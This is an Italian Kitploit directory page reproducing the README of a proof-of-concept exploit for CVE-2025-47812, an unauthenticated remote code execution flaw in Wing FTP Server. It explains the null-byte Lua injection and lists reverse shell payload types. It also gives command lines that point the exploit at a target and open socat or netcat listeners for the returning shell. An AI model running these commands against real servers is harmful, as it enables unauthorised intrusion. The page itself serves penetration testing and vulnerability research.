Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-47812-PoC — Exploit di remote code execution non autenticato per Wing FTP Server (CVE-2025-47812) con molteplici payload di reverse shell, modalità interattiva e CLI, e gestione automatica delle sessioni. | Kitploit
Strumenti/GitHubGitHub/havbay/cve-2025-47812-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed TeamingStrumento di Accesso Remoto
GitHubhavbay/cve-2025-47812-poc

CVE-2025-47812-PoC

Exploit di remote code execution non autenticato per Wing FTP Server (CVE-2025-47812) con molteplici payload di reverse shell, modalità interattiva e CLI, e gestione automatica delle sessioni.

6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2025-47812 — Esecuzione di codice remoto su Wing FTP Server (RCE)

Python CVSS Type

Panoramica

CampoValore
CVECVE-2025-47812
Versione interessataWing FTP Server < 7.4.4
TipoEsecuzione remota di codice non autenticata
Punteggio CVSS10.0 (Critico)
Corretto inWing FTP Server 7.4.4

Come funziona

La vulnerabilità risiede nell'endpoint di login /loginok.html. Il server non riesce a sanificare i byte nulli (%00) nel campo username. Ciò consente a un attaccante di iniettare codice Lua arbitrario nei file di sessione, che vengono successivamente valutati lato server quando si accede a endpoint come /dir.html, senza alcuna autenticazione richiesta.

Riferimento: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


Caratteristiche

  • Esecuzione di comandi non autenticata
  • Molteplici payload di reverse shell (socat, bash, python3, nc-e, nc-fifo, php)
  • Payload Socat prioritizzato per TTY interattivo completo
  • Verifica della raggiungibilità del target preliminare
  • Estrazione automatica dell'UID della sessione con sessione fresca per tentativo
  • Seleziona un payload specifico con il flag --payload
  • Salva l'output del comando in un file con -o
  • --timeout e --delay configurabili
  • Modalità verbose/debug con -v
  • Gestione graziosa di Ctrl+C
  • Riepilogo dei payload dopo i tentativi di reverse shell
  • Modalità argomenti CLI + menu interattivo
  • Output con codice colore

Requisiti

root@kitploit:~
pip install requests

Utilizzo

Modalità interattiva

root@kitploit:~
python3 wingftp_rce_exploit.py

Modalità CLI

root@kitploit:~
# Esegui un comando
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"

# Salva l'output in un file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt

# Reverse shell (prova tutti i payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444

# Reverse shell (payload specifico)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat

Tutte le opzioni

root@kitploit:~
-u / --url        URL di base del target
-U / --username   Nome utente di login (default: anonymous)
-c / --command    Comando da eseguire (modalità comando)
-r / --rhost      IP del tuo listener (modalità reverse shell)
-p / --rport      Porta del tuo listener (modalità reverse shell)
     --payload    Payload specifico da usare (vedi elenco sotto)
     --timeout    Timeout della richiesta HTTP in secondi (default: 10)
     --delay      Ritardo tra tentativi di payload in secondi (default: 4)
-o / --output     Salva l'output del comando in un file
-v / --verbose    Abilita output di debug

Payload di Reverse Shell


Esempi

Esecuzione di comandi

root@kitploit:~
URL di destinazione : http://192.168.1.10:5466
Nome utente   : anonymous
Scelta     : 1
Comando    : whoami

Reverse shell

Passo 1 — Avvia il tuo listener (socat consigliato per TTY completo):

root@kitploit:~
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr

O con nc:

root@kitploit:~
nc -lvnp 4444

Passo 2 — Esegui l'exploit:

root@kitploit:~
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444

Crediti

  • PoC originale di blindma1den
  • Migliorato ed esteso da Havbuy

Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a scopi educativi e a test di sicurezza autorizzati.
NON utilizzarlo contro sistemi di cui non possiedi o non hai esplicita autorizzazione scritta per testare.
L'uso non autorizzato è illegale. Gli autori non si assumono alcuna responsabilità per un uso improprio.

Scarica lo strumento
NomeMetodo
socatPTY completo tramite socat
bashRedirect /dev/tcp
python3Subprocess socket
nc-eNetcat con flag -e
nc-fifoNetcat + mkfifo
phpPHP fsockopen